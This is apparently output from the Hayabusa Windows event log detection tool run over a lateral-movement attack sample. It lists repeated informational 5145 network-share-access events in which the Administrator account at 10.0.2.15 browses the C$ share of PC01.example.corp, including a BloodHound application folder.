10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 
: Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : 
IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 